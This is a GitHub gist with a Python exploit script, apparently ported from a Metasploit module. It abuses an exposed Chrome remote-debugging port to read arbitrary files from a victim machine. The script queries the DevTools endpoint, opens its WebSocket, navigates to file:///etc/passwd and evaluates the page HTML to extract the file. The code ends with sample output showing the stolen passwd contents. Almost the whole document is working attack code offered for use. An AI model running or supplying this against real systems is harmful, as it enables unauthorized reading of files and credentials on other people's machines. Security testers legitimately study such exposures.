Skip to content

Instantly share code, notes, and snippets.

@pich4ya
Created March 6, 2023 11:49
Show Gist options
  • Save pich4ya/5e7d3d172bb4c03360112fd270045e05 to your computer and use it in GitHub Desktop.
Save pich4ya/5e7d3d172bb4c03360112fd270045e05 to your computer and use it in GitHub Desktop.
Chrome Debugger Local File Inclusion (No CVE, a security misconfiguration if the port is accessible for the attacker)
#!/usr/bin/env python
# @author Pichaya Morimoto (p.morimoto@sth.sh)
# Ported from https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/gather/chrome_debugger.rb
# pip install requests websocket-client python-socks
# This exploit code can be used to read arbitrary files on the victim machine with
# chrome/chromium --remote-debugging-port=9222, usually runs as a test automation tool in any software testing phase
import requests
import json
import urllib3
import websocket
import random
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
http_proxy = "http://127.0.0.1:8080"
https_proxy = "https://127.0.0.1:8080"
ftp_proxy = "ftp://127.0.0.1:8081"
proxyDict = {
"http" : http_proxy,
"https" : https_proxy,
"ftp" : ftp_proxy
}
burp0_url = "http://victim:9222/json"
burp0_headers = {"Pragma": "no-cache", "Cache-Control": "no-cache", "sec-ch-ua": "\"Not A(Brand\";v=\"24\", \"Chromium\";v=\"110\"", "sec-ch-ua-mobile": "?0", "sec-ch-ua-platform": "\"macOS\"", "Upgrade-Insecure-Requests": "1", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7", "Sec-Fetch-Site": "none", "Sec-Fetch-Mode": "navigate", "Sec-Fetch-User": "?1", "Sec-Fetch-Dest": "document", "Accept-Encoding": "gzip, deflate", "Accept-Language": "en-US,en;q=0.9", "Connection": "close"}
resp = requests.get(burp0_url, headers=burp0_headers).text
# resp = requests.get(burp0_url, headers=burp0_headers, proxies=proxyDict, verify=False).text
# print(resp)
webSocketDebuggerUrl=json.loads(resp)[0]['webSocketDebuggerUrl']
print(webSocketDebuggerUrl)
# generate a random integer between 1000 and 5000
id = random.randint(1000, 5000)
# create the JSON query
query = {
"id": id,
"method": "Page.navigate",
"params": {
"url": "file:///etc/passwd"
}
}
query_json = json.dumps(query)
# connect to the WebSocket endpoint
ws = websocket.create_connection(webSocketDebuggerUrl)
# ws = websocket.create_connection(webSocketDebuggerUrl, http_proxy_host="127.0.0.1", http_proxy_port="1080", proxy_type="socks5")
# ws.connect("ws://echo.websocket.events",
# http_proxy_host="127.0.0.1", http_proxy_port="8080",
# proxy_type="http", http_proxy_auth=("username", "password123"))
# send the JSON query
ws.send(query_json)
# get the WebSocket response
response = ws.recv()
print(response)
# create the second JSON query
query2 = {
"id": id + 1,
"method": "Runtime.evaluate",
"params": {
"expression": "document.documentElement.outerHTML"
}
}
query2_json = json.dumps(query2)
# send the second JSON query
ws.send(query2_json)
# get the second WebSocket response
response2 = ws.recv()
print(response2)
# close the WebSocket connection
ws.close()
# Output:
# ws://victim:9222/devtools/page/3D53F4B043DE842A90FCB6A1B854B11A
# {"id":1121,"result":{"frameId":"3D53F4B043DE842A90FCB6A1B854B11A","loaderId":"EFD61728BF3DD2E0A2DEB05FF083FE3C"}}
# {"id":1122,"result":{"result":{"type":"string","value":"<html><head><meta name=\"color-scheme\" content=\"light dark\"></head><body><pre style=\"word-wrap: break-word; white-space: pre-wrap;\">root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/[...]/bin/false\n</pre></body></html>"}}}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment